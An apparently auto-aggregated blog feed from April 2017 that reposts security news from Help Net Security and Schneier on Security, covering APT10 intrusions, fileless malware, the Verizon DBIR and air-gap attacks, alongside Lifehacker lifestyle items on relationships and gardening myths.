Sunday, April 30, 2017
Week in review: Lure10 attack, DoublePulsar exploit proliferation
Here’s an overview of some of last week’s most interesting news and articles:
BrickerBot bricked 2 million IoT devices, its author claims
The author of BrickerBot, which “bricks” IoT devices by rewriting the flash storage space and wiping files, has emerged to explain that the malware first attempts to secure the units without damaging them.
Security improvements primary reason for Windows 10 migration
Migration to Windows 10 is expected to be faster than previous OS adoption, according to a survey by Gartner. The survey showed that 85 percent of enterprises will have started Windows 10 deployments by the end of 2017.
Russian carding industry pioneer sentenced to 27 years in prison
Under the nickname “Track2,” Seleznev created two automated vending sites, an innovation that made it possible for criminals to efficiently search for an purchase stolen credit card data through a process as easy as buying a book on Amazon.
Lure10: Exploiting Wi-Fi Sense to MITM wireless Windows devices
Karma has long been a staple man-in-the-middle attack used in authorised wireless security assessments and unsanctioned ones, but as many modern operating systems now provide effective countermeasures, other approaches for tricking wireless clients into automatically associating with a rogue access point are wanted. Enter Lure10 – a new attack that, by taking advantage of Wi-Fi Sense, tricks wireless devices running Windows into doing exactly that.
IT service providers, many other orgs targeted in long-standing attack campaign
According to preliminary analysis, threat actors appear to be leveraging stolen administrative credentials (local and domain) and certificates, along with placing sophisticated malware implants on critical systems.
Industry reactions to the Verizon 2017 Data Breach Investigations Report
Nearly 2,000 breaches were analyzed in this year’s Verizon 2017 Data Breach Investigations Report and more than 300 were espionage-related.
Know your enemy: Defining the new taxonomy of malicious emails
Familiarity can breed contempt, and all users are now at risk from increasingly more advanced email attacks, which have become vastly more sophisticated in the last few years.
Tens of thousands Windows systems implanted with NSA’s DoublePulsar
Has your Windows machine been implanted with NSA’s DoublePulsar backdoor? If you haven’t implemented the security updates released by Microsoft in March, chances are good that it has. The good news is that the backdoor can now be remotely uninstalled from any infected Windows machine thanks to the updated detection script provided by security firm Countercept, as well as by rebooting the affected machines.
How secure are mobile banking apps?
Accenture and NowSecure have performed vulnerability assessments of customer-facing mobile banking apps of 15 banking institutions in the North American market.
Alleged Kelihos botmaster indicted
Pyotr Levashov, who went online under several nicknames – the most memorable of which was “Peter Severa” (i.e. Peter of the North) – was arrested in Barcelona on April 7, 2017, while on vacation with his family.
How to securely deploy medical devices within a healthcare facility
The risks insecure medical devices pose to patient safety are no longer just theoretical, and compromised electronic health records may haunt patients forever.
Will fileless malware push the antivirus industry into oblivion?
The death of antivirus has been prophesied for years now, but the AV industry is still alive and kicking. SentinelOne, though, believes that in-memory resident attacks, i.e. fileless malware, just might be the thing that pushes it into oblivion.
Executive spotlight: iovation’s new Vice President of Product
Last week iovation announced that Dwayne Melancon was leaving Tripwire after 17 years and joining the company as the new Vice President of Product, so we decided to get in touch and see what are his future plans.
Behavioural profiling: Spotting the signs of cyber attacks and misuse
Behavioural profiling is increasingly recognised as a new level of protection against cyber attacks and systems abuse, offering the potential to pick out new and unknown attacks, or to spot activities that may be missed.
Cybercrime can come in any shape or size, and not always the form you’d expect
Cyberespionage is now the most common type of attack seen in manufacturing, the public sector and now education, warns the Verizon 2017 Data Breach Investigations Report. Much of this is due to the high proliferation of propriety research, prototypes and confidential personal data, which are hot-ticket items for cybercriminals.
Modern threat landscape: Seismic shifts in motivation and focus
Cybercriminals revealed new levels of ambition in 2016 – a year marked by extraordinary attacks, including multi-million dollar virtual bank heists and overt attempts to disrupt the U.S. electoral process by state-sponsored groups.
Phishing attacks responsible for three-quarters of all malware
While technical attacks on the newest vulnerabilities tend to dominate the media, many attacks rely on less technical means.
SquirrelMail opens users to remote code execution
Users of open source webmail software SquirrelMail are open to remote code execution due to a bug (CVE-2017-7692) discovered independently by two researchers.
New infosec products of the week: April 28, 2017
A rundown of infosec products released last week.
from Help Net Security http://ift.tt/2oME6FA
Saturday, April 29, 2017
Friday, April 28, 2017
Fusion New World Order in the Court: A Dispatch From the Alex Jones Trial | The Concourse Who’s Tire
Fusion New World Order in the Court: A Dispatch From the Alex Jones Trial | The Concourse Who’s Tired Of All The Winning? | Pictorial 20 Years Ago Ellen DeGeneres Came Out In Front of a Live Studio Audience | The Root I Tried to Read Nbecki’s, I Mean Rachel Dolezal’s, In Full Color so You Didn’t Have to, and I Failed |
from Lifehacker http://ift.tt/2pujGR1
All the Passive Aggressive Stuff You Should Never Do in a Relationship
Nobody enjoys being with someone who is always passive aggressive. If you’re not sure what that looks like, here’s an excellent, and funny, demonstration.
“The key to a great relationship is control...” says the doomed couple in this video from the AwakenWithJP YouTube channel. “Control is the thread that keeps your relationship together, and we found that being passive aggressive is the best way to control your partner.” Obviously, these two are playing for laughs, but the lesson they share is right on the money.
Being passive aggressive is more than just frustrating to the people you care about, it sends mixed signals about how you really feel. If you want to be a good partner and keep things going well, here’s a quick rundown of all the passive aggressive things you should always avoid doing:
Advertisement
Advertisement
- Cold shoulder treatment: Not only is it the worst way to let someone know they did something you didn’t like, it slowly makes people assume they’re just wrong for being who they are.
- Snarky comments: There’s no room for snark or misdirected shaming when you want to show gratitude. It’s not “Thank you for cleaning the kitchen for once,” it’s “Thank you for cleaning the kitchen.”
- Crushing your partners dreams: If your partner is excited about pursuing a goal, don’t cut them down, support them. It’s okay to help keep them grounded so they manage their expectations well, but don’t make yourself another barrier for them to overcome.
- Backhanded compliments: These are always rude, no matter who you’re talking to. Just be supportive and give regular compliments.
- Making your partner feel inept: This is perhaps the worst one of them all. Saying things like “...if you made more money,” “...if you ever took time off for us,” and “...if we had a nicer home” is a recipe for disaster.
There’s no way around it—constant passive aggressive behavior is a type of emotional abuse. To stop it, self awareness is key. When you know what to look for, it’s easier to catch yourself before you say or do things like this.
from Lifehacker http://ift.tt/2qgC3a4
Friday Squid Blogging: Live Squid Washes up on North Carolina Beach
A "mysterious squid" -- big and red -- washed up on a beach in Carteret County, North Carolina. Someone found it, still alive, and set it back in the water after taking some photos of it. Squid scientists later decided it was a diamondback squid.
So, you think that O'Shea might know the identity of the squid Carey Walker found on the Portsmouth Island Beach, just by looking at an emailed photo or two? Indeed, he did. After a couple of days of back-and-forth emails -- it can be difficult to connect consistently with a world-famous man who lives now in Australia -- he reported that, while unusual to be seen on beaches in our parts, this was not a particularly unusual squid: It was a diamondback squid, known in scientific nomenclature as Thysanoteuthis rhombus.
T. rhombus, also known as the diamond squid or diamondback squid, is a large species that grows to about 100 centimeters in length, which translates to about 39 inches, and ranges in weight from 20 to 30 kilograms, which translates to 44 to 50 pounds. Which means that, if nothing else, Carey Walker is pretty good at estimating the weight and length of big red squids he picks up on remote beaches.
As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.
Read my blog posting guidelines here.
from Schneier on Security http://ift.tt/2qggyWZ
Don't Buy Ladybugs to Control Aphids, and Other Gardening Myths Debunked
Ladybugs eat aphids. So if aphids are eating your potato plants, you might be tempted to mail-order a ton of ladybugs (yes, this is a thing you can do) to solve your garden woes. There’s a flaw in that plan, though: when you release ladybugs, they fly away.
Advertisement
I learned the truth about ladybugs, which really should have been obvious from the start, thanks to this video. It’s from Good Gardening Videos, a site run by garden writers and scientists who know which advice is evidence-based and which isn’t. This video tackles four myths, but there’s way more where that came from.
So if the ladybugs fly away, what can you do? The host here suggests you turn your garden into a place where ladybugs will want to live—and when you do that, you won’t need to buy any ladybugs because they’ll move in for free. To create a ladybug paradise, it helps to grow a variety of plants, avoid insecticides, and to let at least some of your aphids live. After all, the ladybugs won’t show up if you’re constantly taking away their food supply.
Advertisement
Watch the video for more, including the truth about adding phosphorus to the soil (it doesn’t help as much as you think, and can hurt) plus two myths about mulching.
from Lifehacker http://ift.tt/2oR1Q6C
Jumping Airgaps with a Laser and a Scanner
Researchers have configured two computers to talk to each other using a laser and a scanner.
Scanners work by detecting reflected light on their glass pane. The light creates a charge that the scanner translates into binary, which gets converted into an image. But scanners are sensitive to any changes of light in a room -- even when paper is on the glass pane or when the light source is infrared -- which changes the charges that get converted to binary. This means signals can be sent through the scanner by flashing light at its glass pane using either a visible light source or an infrared laser that is invisible to human eyes.
There are a couple of caveats to the attack -- the malware to decode the signals has to already be installed on a system on the network, and the lid on the scanner has to be at least partially open to receive the light. It's not unusual for workers to leave scanner lids open after using them, however, and an attacker could also pay a cleaning crew or other worker to leave the lid open at night.
The setup is that there's malware on the computer connected to the scanner, and that computer isn't on the Internet. This technique allows an attacker to communicate with that computer. For extra coolness, the laser can be mounted on a drone.
Here's the paper. And two videos.
from Schneier on Security http://ift.tt/2oFGDBw
Screengrabber Last Night’s Winner Was This Packers Fan At A Bears Draft Party | Jezebel This Oral Hi
Screengrabber Last Night’s Winner Was This Packers Fan At A Bears Draft Party | Jezebel This Oral History of Austin Powers Is the Best Thing I’ve Ever Read | The Root I, a White, Rode the Train With Blacks 1 Day, and It Was Crazy: An Atlanta-Newspaper Reader Writes on Race | Fusion Say Latasha Harlins’ Name |
from Lifehacker http://ift.tt/2qeFIoX
IT service providers, many other orgs targeted in long-standing attack campaign
US-CERT has released an alert warning about a sophisticated attack campaign using multiple malware implants and targeting organizations in the IT, Energy, Healthcare and Public Health, Communications, and Critical Manufacturing sectors.
“According to preliminary analysis, threat actors appear to be leveraging stolen administrative credentials (local and domain) and certificates, along with placing sophisticated malware implants on critical systems,” the alert says.
“Some of the campaign victims have been IT service providers, where credential compromises could potentially be leveraged to access customer environments. Depending on the defensive mitigations in place, the threat actor could possibly gain full access to networks and data in a way that appears legitimate to existing monitoring tools.”
Apparently, the attacks have been going on since May 2016, at least, and they continue. The National Cybersecurity and Communications Integration Center (NCCIC) has, therefore, released indicators of compromise (IOCs) so organizations could check their networks and systems for compromise.
Known malicious domains, fileless malware
The IOC files note that some of the domains used in the attack could be possibly associated with the C&C infrastructure of Stone Panda (aka APT10, aka menuPass). The group is believed to be of Chinese origin, and has apparently been involved in the recent attacks against South Korean targets, as well as espionage efforts against US companies lobbying the Trump administration on global trade, and various organizations in Japan.
“User impersonation via compromised credentials is the primary mechanism used by the adversary. However, a secondary technique to maintain persistence and provide additional access into the victim network is the use of malware implants left behind on key relay and staging machines,” US-CERT also noted.
“In some instances, the malware has only been found within memory with no on-disk evidence available for examination. To date, the actors have deployed multiple malware families and variants, some of which are currently not detected by anti-virus signatures. The observed malware includes PlugX/Sogu and Redleaves.”
IOCs for the PlugX/Sogu and Redleaves malware variants used by the group can also be found in the IOC documents added to the report.
“The Redleaves implant consists of three parts: an executable, a loader, and the implant shellcode. The Redleaves implant is a remote administration Trojan (RAT) that is built in Visual C++ and makes heavy use of thread generation during its execution. The implant contains a number of functions typical of RATs, including system enumeration and creating a remote shell back to the C2,” US-CERT explains.
PlugX is a sophisticated Remote Access Tool (RAT) operating since approximately 2012. It is known to use DLL side-loading to evade anti-virus and to maintain persistence on a victim system, and that’s also the case in these campaigns.
NCCIC has provided a comprehensive list of mitigations that should work to keep these intruders out.
from Help Net Security http://ift.tt/2pbjIg0
Stealing Browsing History Using Your Phone's Ambient Light Sensor
There has been a flurry of research into using the various sensors on your phone to steal data in surprising ways. Here's another: using the phone's ambient light sensor to detect what's on the screen. It's a proof of concept, but the paper's general conclusions are correct:
There is a lesson here that designing specifications and systems from a privacy engineering perspective is a complex process: decisions about exposing sensitive APIs to the web without any protections should not be taken lightly. One danger is that specification authors and browser vendors will base decisions on overly general principles and research results which don't apply to a particular new feature (similarly to how protections on gyroscope readings might not be sufficient for light sensor data).
from Schneier on Security http://ift.tt/2oPyN3k
Will fileless malware push the antivirus industry into oblivion?
The death of antivirus has been prophesied for years now, but the AV industry is still alive and kicking. SentinelOne, though, believes that in-memory resident attacks, i.e. fileless malware, just might be the thing that pushes it into oblivion.
They base their conjecture on the results of the attack detections made through over a million of SentinelOne Endpoint Protection Platform agents, deployed in enterprise environments across the world. These detections are made at the endpoint, i.e. they only include the attacks that were not mitigated by other security technologies before reaching the endpoint.
The results show that, from August to November 2016, the threats that come from document-based files (usually MS Word and Adobe PDF) have a pretty steady incidence.
At the same time, the percentage of attacks coming from executable files has been falling, while the rate of successful attacks detected only in the memory of the system have risen.
This latter type of attack may exploit existing operating system resources, and run code or instructions directly from memory, leaving no associated new artefacts on the system.
Characteristics of in-memory resident attacks
“Often the originating object will be cmd.exe, powershell.exe or mshta.exe, as legitimate and essential operating systems resources that are subverted as
the payload platform during the exploitation stage, instigated frequently either by a document received by email, malicious script or an active code component on a web page,” SentinelOne researchers noted.
“There are many different methods and tools that we detected trying to gain a foothold in memory; WMI persistence is one such tactic. This type of technique was first discovered during the investigation into Stuxnet and later also identified as a method used in the attack on the Democratic National Committee,” they shared.
“Another common attack pattern we see is a ‘live’ or interactive attack, where the attacker delivers a weaponized document and is able to employ a meterpreter reverse shell, powersploit payload or red team testing frameworks. We often see hackers invoke reflective injection techniques to run late stage tools such as mimikatz, to gather credentials on the impacted system. We routinely spot the insertion of javascript into command line instructions and observed an increasing trend in exploits issuing malware payloads in shellcode rather than a file.”
The rise of the fileless threat
Fileless threats are not a new occurrence, but there has definitely been a rise in attack reports leveraging them.
According to Kaspersky Lab researchers, fileless malware is being used in attacks by both targeted threat actors and cybercriminals in general.
“We have seen such techniques being widely adopted in the last few months. We find examples in the lateral movement tools used in Shamoon attacks, in attacks against Eastern European banks, and used by different APT actors such as CloudComputating, Lungen or HiddenGecko, as well as in the evolution of old backdoors like Hikit, which evolved to new fileless versions,” they noted.
“This trend makes traditional forensic analysis harder, traditional IOCs such as file hashes obsolete, application whitelisting more difficult, and antivirus evasion easier. It also helps to evade most of the log activity.”
SentinelOne also pointed out that the Angler EK now has a fileless option, and Kovter, Phasebot, Powersniff and LatentBot are just some of the recent examples of threats employing in-memory tactics.
And while executable files are still a highly-encountered type of threat, fileless threats should not be discounted, especially as they have an easier time evading traditional and static file inspection dependent security models.
from Help Net Security http://ift.tt/2pagI3s
How to securely deploy medical devices within a healthcare facility
The risks insecure medical devices pose to patient safety are no longer just theoretical, and compromised electronic health records may haunt patients forever.
A surgical robot, pacemaker, or other life critical device being rendered non-functional would give a whole new, and wholly undesirable, meaning to denial of service.
Malware like MEDJACK has been used to infect medical devices and use them as staging grounds to attack medical records systems. IoT ransomware is on the rise and BrickerBot has been rendering IoT devices non-functional. And as medical devices are, at heart, IoT devices, they are subject to all the same risks.
Healthcare organizations need to give consideration to these things during both the acquisition and deployment of medical devices.
They also need to think about setting up perimeter defenses, network and device security controls, interface and central station security, implementing security testing, and about setting up an incident response plan.
OWASP Secure Medical Device Deployment Standard
For those security practitioners that don’t know where to start, the recently published OWASP Secure Medical Device Deployment Standard is a good first read.
Authored by Christopher Frenz, a healthcare information security and privacy expert that specializes in a holistic approach to organizational security, the document provides a set of best practices that organizations can compare their deployments to or base their deployments on.
The project is designed to raise awareness of the various approaches healthcare organizations can take to better secure medical device deployments and in doing so not only better protect patient information, but better protect the patient.
“The OWASP project focuses on the hospital and healthcare provider side of the equation and in that way is complimentary to the more manufacturer-focused guidance recently released by the US Food and Drug Administration,” Frenz noted.
“It is also highly complementary to the Hippocratic Oath for Connected Medical Devices put forth by I Am The Calvary.”
from Help Net Security http://ift.tt/2qdekHX
Industry reactions to the Verizon 2017 Data Breach Investigations Report
Nearly 2,000 breaches were analyzed in this year’s Verizon 2017 Data Breach Investigations Report and more than 300 were espionage-related. Here are some of the comments Help Net Security received on the report.
John Madelin, CEO at Reliance acsn
Today’s report highlights that businesses must rethink their protection strategies to guard against cyber attacks. The fact that 88% of breaches identified in the report fall into patterns first identified in 2014 is an illustration of the need for businesses to identify and properly secure their critical data and assets against attack. The continued success of tried and tested methods deployed by hackers is indicative of senior leaders lacking the knowledge to approach the issue, and instead relying on quick fixes. The truth is, the patchwork of security solutions that are deployed in many organisations are too often ineffective in securing the data at the heart of business today.
This also reflects on the security industry more broadly. Client organisations should be educated on the structure of their data assets, and how to manage their security holistically. The correct technology and process, coupled with effective alerting, alarming and active hunting for threats will set organisations on the right path to avoiding disasters.
It’s high time a structured approach to cybersecurity is deployed across the industry to reduce the damage caused by hackers. Most importantly for business leaders, as well as promising better protection this more focused and integrated approach always results in better economics overall.
Pete Banham, Cyber Resilience Expert at Mimecast
Impersonation fraud and ransomware attacks via email are now the easiest ways for criminals to steal money and valuable data.
Impersonation attacks rarely include a malicious link or attachment, bypassing many traditional security detections. Ransomware is a well-organised threat, with many organisations choosing to pay off hackers quietly to make the threat go away instead of combatting the problem.
The best defence against these types of attack is a layered approach to security, including sandboxing of email attachments, stamping of external email with warnings and on-going employee awareness campaigns.
Fraser Kyne, EMEA CTO at Bromium
What most interested me in this year’s DBIR was that phishing attacks are actually becoming even more prevalent. One in 14 users are being duped into clicking on a bad link or attachment; but even worse, a quarter of those people go on to do it again! There is a phrase that I think is very apt here – “You can’t patch stupidity”.
Essentially, what the DBIR shows us is that you can have the best education, the best processes and the most on-point detection capabilities available, but you will still take a hit. People within the organisation will always find a way around security to get their job done, and clever hackers will always trick end-users into doing something stupid. That’s probably also why we saw such a drastic spike in ransomware in this year’s DBIR; phishing is a great vehicle for hackers to deliver their payload and get ransomware running on a user’s machine. The fact is that however cyber-savvy they are, end-users will always be the weakest link in security.
Organisations therefore need to shift the onus away from controlling user behaviour if they are to get a handle on the situation. The best way of mitigating phishing attacks is to have a safety net in place, allowing end-users to click with freedom, without having to worry too much about stumbling upon a bad link or malicious attachment. Micro-virtualisation is key to this, ensuring that each user task is contained within its own fully isolated and unique virtual environment. As a result, any malicious files are trapped within that virtual machine, posing no risk to the rest of the system. If a user finds themselves opening a malicious email or document, they can simply close down that window, and the threat disappears.
Ilia Kolochenko, CEO at High-Tech Bridge
As in the previous report from 2016, insecure web applications dominate the top attack vectors in almost all the industries. Cybercrime is a [criminal] business, and thus follows the basic rules of business: spend less, get more. Attackers are always looking for the weakest link in your IT infrastructure, before leveraging expensive 0days and complicated APT attacks.
Today, the majority of large organizations and governments can be easily breached via their web and mobile (backend) applications. Emerging risk comes from third-party applications, which are exploited by hackers to compromise your trusted third-party and get access to your data afterwards – cloudization, outsourcing and IT externalization aggravate this complicated challenge.
The report confirms Google’s research, which found a 32% increase in website hacking in 2016. Application security becomes a major problem for organizations and should be addressed as a high priority.
Darren Anstee, CTO at Arbor Networks
Verizon’s Data Breach Investigations Report is an industry gold standard for examining the threat landscape. The fact that it reveals the risk of DDoS attacks has never been higher for industries such as finance, retail and others who are reliant on Internet services and manage large quantities of high value data really emphasises the serious situation facing businesses today.
Organisations in these sectors must invest appropriately to protect themselves and their customers. They can do this by taking the fight to cyber-criminals with improved intelligence sharing and better co-operation with law enforcement. Businesses should also implement layered security, using on premise solutions to deal with targeted attacks and then the cloud to deal with large volumetric attacks. Organisations need to also strengthen their visibility and threat detection capabilities across internal networks so that they have broad and deep visibility of network traffic, threats and user behaviour.
from Help Net Security http://ift.tt/2paiykX
Employees increasingly allowed to move data onto personal mobile devices
Corporate data governance programs are difficult to establish and enforce. For the most part, these programs lack the necessary people, processes and technology to effectively fend off security threats, data breaches, regulatory fines and lawsuits.
The two weakest links in a company’s data governance program are uncontrolled user access to data (53 percent) and managing where data is stored (43 percent), according to a new research study released by Blancco Technology Group.
Data protection and regulatory compliance are further complicated by the fact that organizations are often too lenient in allowing employees to transfer data inside and outside their organizations. For instance, 69 percent of the surveyed IT professionals admitted they allow employees to transfer data onto their personal mobile devices with only minor limitations and 33 percent allow employees to move data to cloud providers, such as Dropbox, without any restrictions at all.
On top of this, 47 percent of organizations either have limited visibility or no visibility at all into how employees move data offsite.
Key findings
Organizations are more concerned with protecting corporate reputations than passing audits and avoiding regulatory penalties. 48 percent of organizations said their biggest concern with data protection regulations is protecting their reputations, while only 38 percent are worried about passing audits and 40 percent are concerned with avoiding penalties.
Unstructured and dark data are growing liabilities for organizations. Despite IDG’s prediction that 93 percent of digital data will be unstructured by 2022, only 41 percent of organizations have a central repository for managing unstructured data. Meanwhile, 34 percent either don’t have any tools in place to manage unstructured data or are in the process of investigating the necessary tools.
Data classification is an important step in laying the foundation for data protection and regulatory compliance. 58 percent classify data according to legal requirements, while 56 percent classify data based on how sensitive it is to unauthorized disclosure/modification and 43 percent classify it according to its perceived value to their organization. However, 5 percent don’t know how data is classified inside their organization, while 13 percent either don’t classify data or don’t know if they do.
The absence and non-enforcement of data removal policies conflicts with EU GDPR’s ‘right to erasure.’ 13 percent of organizations don’t securely erase digital files and folders that are no longer needed or used. On top of this, 16 percent don’t have a data removal policy for when data is no longer needed and 22 percent don’t have written data disposal/destruction policies to handle data that’s no longer needed.
Overall, the study highlights a common, yet unfortunate reality in most enterprises today – what you don’t know can hurt you. One such unknown is the amount of time that data should be retained. In particular, 22 percent of the surveyed IT professionals admitted they keep data forever, while 18 percent said they keep data for a set amount of time regardless of data type.
“The reality is that many organizations adhere to a ‘storage is cheap, keep everything’ mentality,” said Richard Stiennon, Chief Strategy Officer, Blancco Technology Group. “Data hoarding as a practice can be dangerous, as we saw during the Yahoo hack last year when hacker ‘Peace’ leaked four-year-old data from 200 million Yahoo accounts onto the dark web. Organizations need to learn that, as data ages, its usefulness declines. In actual fact, all retained data is a liability for discovery, breach, theft or loss. When its value is less than the liability, when customers demand it (i.e. closing out accounts) and when regulations require it, organizations need to permanently erase the data so it can never be recovered and result in another situation like the Yahoo breach.”
from Help Net Security http://ift.tt/2oRIeAt
Thursday, April 27, 2017
New infosec products of the week: April 28, 2017
Cyberbit EDR uses adaptive behavioral analysis to detect fileless, signature-less attacks
Cyberbit announced a new version of its adaptive Endpoint Detection and Response (EDR) platform, which now provides semi-automated threat hunting, centralized response capabilities, and an improved SDK for detection customization. Originally developed to meet requirements of high-risk organizations, Cyberbit’s new EDR enhancements help customers decrease threat detection and response times while minimizing false positives, improving cyberattack countermeasures and cutting distractions for security teams.
Elcomsoft Cloud eXplorer extracts data from Google accounts
Elcomsoft Cloud eXplorer is a digital forensic tool for remotely acquiring information from Google accounts. Version 1.30 adds the ability to download text messages backed up by Google Pixel smartphones and devices running Android O Developer Preview. In addition, the update improves the handling of enhanced location data, routes and places. The ability to process users’ routes and places improves readability of location data, providing experts a concise list of places instead of numerical geolocation coordinates.
Gigamon delivers visibility for securing 40Gb and 100Gb networks
Gigamon announced the release of the GigaVUE-HC3, a high-performance appliance to enable pervasive visibility and security intelligence at scale in 10Gb, 40Gb and 100Gb networks. The new offering extends the Visibility Platform and GigaSMART technologies with higher compute and throughput performance to manage, secure and analyze high volumes of data in transit across networks.
Inside Secure releases latest true random number generator
Inside Secure released the newest version of TRNG-IP-76, the company’s true random number generator (TRNG). The CPU is no longer unnecessarily powered, since entropy generation is now completed as a background task. This reduces overall power consumption and saves battery life.
Sparta Consulting releases solution to address information manipulation and integrity
Huginn introduces the capability to provide security by analyzing events in the information assets. As the events are captured, they are analyzed in the corresponding business context and judged as either legitimate business events or something which need further analysis or impact prevention as immediate security threats. Huginn utilizes the IBA-approach. It does not contradict your existing security stack but complements it and co-operates with other solutions by analyzing the events they raise and providing additional inputs to their solutions.
WatchGuard’s AP322 brings secure, high-performance Wi-Fi outdoors
WatchGuard announced the AP322, a new high-performance cloud-ready outdoor AP. Sporting a ruggedized IP67 enclosure with 3×3 MIMO and 802.11ac support, it extends the benefits of WatchGuard’s Wi-Fi Cloud to the raw outdoors and is perfect for stadiums, schools, open-air cafes and malls, hotel pool areas and more. The WatchGuard AP322 delivers dual concurrent 5 GHz and 2.4 GHz band radios, with data rates up to 1.3 Gbps and 450 Mbps, respectively.
WISeKeyIoT: PKI framework tailored for the Internet of Things
WISeKeyIoT is a scalable framework, offering digital PKI certificates for connected devices, protected in certified tamper resistant silicon chips, as well as an outsourced or on-premises certificate management system, with device life cycle control functions and security enforcement entities. The digital PKI certificates can be signed by the publicly trusted root, owned by OISTE and operated by WISeKey.
from Help Net Security http://ift.tt/2pFec6Z
IT teams struggle with digital transformation skills
New research conducted by Vanson Bourne aims to uncover how well-placed global IT leaders consider themselves and their teams to be in terms of meeting current and future business demands. Of the six markets surveyed, Germany was found to be the best prepared to meet its digital transformation goals, closely followed by the U.S., while the UK lagged well behind its counterparts.
The research, which surveyed 630 IT leaders in the U.S., UK, France, Germany, Australia, and Singapore, indicates that many organisations are at a tipping point, as new technology demands are set to outstrip the skills supply. Organisations that address this now through additional skills training will be in the strongest position to ensure business growth and competitive advantage.
Overall, an encouraging 74 percent of UK IT leaders acknowledge that IT departments are currently recognised as very important or critical to innovation and business growth. However, almost two thirds (63 percent) predict they will struggle with a lack of IT talent in 12 months. Contributing factors identified from the research include skills shortages, prevalence of outdated skills, lack of commitment to training at the corporate board level, and the rapidly changing technology environment.
“Businesses are approaching the peak of IT strategic influence. Now is the moment that IT teams feel they have the strongest opportunity to influence the transformation of their organisations,” said Christine Heckart, chief marketing officer and senior vice president of ecosystems, Brocade. “However, with a rapidly changing technology landscape and potential impact on international labour markets, it is critical that IT receives the right training to further develop their skills and business relevance.”
The research also found that skills planning had to be aligned with other areas of business planning to avoid the risk of a technology skills deficit, where IT teams are expected to deliver the benefits of technologies that they are ill-equipped to implement.
Staff shortages and outdated skills
Organisations are attempting to move their IT departments away from their traditional roles, but the lack of skills and the time required to learn those skills have held them back. IT decision makers (ITDM) believe this could be a major contributor to their inability to meet business demands, putting organisations at risk of falling behind their competitors and losing customers.
Approximately one in four respondents in Australia, France, Germany, Singapore, and the U.S. claim that they cannot deliver on current business demand due to staff shortages. This number rises to 42 percent in the UK.
Respondents claim that the lack of access to talent will prevent them from implementing new technologies efficiently, lead to a decrease in employee satisfaction, and result in the loss of market share.
The IT skills gap is only likely to get worse
The political landscape is also a contributing factor in the widening skills gap. As market uncertainty intensifies in the next few years, it is more important than ever for IT departments to remain agile and take advantage of new technologies.
- Ninety percent of those questioned in the UK had some level of concern about future hiring of IT staff, while 63 percent were concerned about a lack of skilled talent to choose from.
- Forty-three percent of global respondents agreed or strongly agreed that the current political climate makes it difficult to hire employees with the right skills. In the U.S. and Australia, the numbers were 52 percent and 54 percent, respectively.
- Even with the uncertainty surrounding the Brexit situation, EMEA respondents were less concerned, with only 31 percent of UK ITDMs believing it presented a challenge compared to 39 percent in Germany and 35 percent in France.
Training time and investment will prove to be business-critical
Training continues to be an issue as day-to-day IT maintenance tasks take priority. For organisations to address the technical skills deficit, they first need to invest time and money—or face the consequences.
- There is demand in the UK to spend more time on increasing skills—from 10 percent of time that is currently spent on this to 20 percent.
- Respondents reported that insufficient budget (45 percent) and training time (45 percent) are constraining IT departments’ attempts to develop skills more than any other factors. These were most pronounced in the UK (61% and 50%).
- Currently, only three hours are allocated per week for learning and skills development, this goes down to one hour for UK respondents.
- Seventy percent of UK respondents agree that the key to closing the skills gap would be to spend more money on training.
IT pros need to take control of their future
The research also showed that IT professionals at all levels must take increased responsibility for their own professional destiny, embracing the opportunities delivered by new technologies such as artificial intelligence (AI) and all areas of IoT (from device management to security).
Thirty percent of UK respondents agreed or strongly agreed that their organisation’s IT team does not have the right skills to protect their jobs in the future.
When asked to identify the one skill that they see as critical to their future career progression, cybersecurity was the most frequently cited, by 35 percent of respondents in the UK.
AI could be a friend or foe
AI could revolutionise the IT skills that are required and the way that we work. AI is likely to replace a number of IT roles and tasks, but this doesn’t mean the end for the IT department. Employees need to have the right skills to be in a position to work alongside AI and embrace its future impact, so that organisations can unleash its full potential.
- When asked which current roles were already being replaced by AI in the UK, desktop support (5 percent), data analyst (4 percent), software testers (3 percent) and system architects (4 percent) topped the list. Although the values were much higher globally with 23 percent, 20 percent, 17 percent and 14 percent stating the roles respectively had already been replaced.
- Within the next 10 years, these numbers are expected to increase in the UK: desktop support (30 percent), data analyst (34 percent), software testers (35 percent), system architects (14 percent), and network engineers (28 percent).
- AI will also impact the role of the CIO, with over a quarter (26 percent) of the UK respondents claiming increased focus from the business.
- Sixty-two percent of respondents believe that developing AI-related skills is key to securing a role in the future.
Vital role of the board in ensuring long-term IT skills development
Organisations’ boards will often dictate whether employees have the time and empowerment to develop their skills, but this is common at organisations that do not have the right support. The boards also have to ensure that skills and training improvements are aligned with other areas of business planning.
- Forty-four percent of respondents think that new skills acquisition is not seen as being as valuable as it should be by the board. This rises to 59 percent in Australia and 50 percent in the UK. The U.S. (42 percent), Germany (41 percent), Singapore (40 percent), and France (34 percent) had slightly more positive results.
- Almost a fifth (16 percent) of UK respondents think their boards view gaining knowledge and skills as a cost to the business, rather than an asset. This rises to 35 percent in Australia.
- Despite respondents (in the UK and globally) claiming that they plan approximately two years in advance for most areas of the business, staffing and recruitment is still on average only planned for a maximum of a year.
- This is creating a disconnect where organisations are attempting to address key IT challenges with teams not as well equipped in terms of skills and experience as they could be.
from Help Net Security http://ift.tt/2qlrT7b
The Slot A Tale of 2 White Bores and Their 2 White Boards | Fusion We Asked ICE About the Prank Call
The Slot A Tale of 2 White Bores and Their 2 White Boards | Fusion We Asked ICE About the Prank Calls to Their Anti-Immigrant Hotline and They Kind of Lost Their Shit | Deadspin How To Suck At Being A Sports Media Critic | The Root People Are Outraged That Obama Got $400,000 as a Speaking Fee |
from Lifehacker http://ift.tt/2qcfNhB
Deadspin An Interview With A Man Who Has Willingly Watched Every Round Of Every NFL Draft Since 1999
Deadspin An Interview With A Man Who Has Willingly Watched Every Round Of Every NFL Draft Since 1999 | Jezebel Caitlyn Says She Hasn’t Spoken to Khloe in ‘Like, Two Years,’ Contradicting Recent KUWTK Episodes | Fusion What the Hell is Going On With Donald Trump and NAFTA? | The Grapevine Man Files Suit Against R. Kelly, Charging He Had Affair With His Wife and Gave Her Chlamydia |
from Lifehacker http://ift.tt/2oAiKLJ
Reading Analytics and Privacy
Interesting paper: "The rise of reading analytics and the emerging calculus of reading privacy in the digital world," by Clifford Lynch:
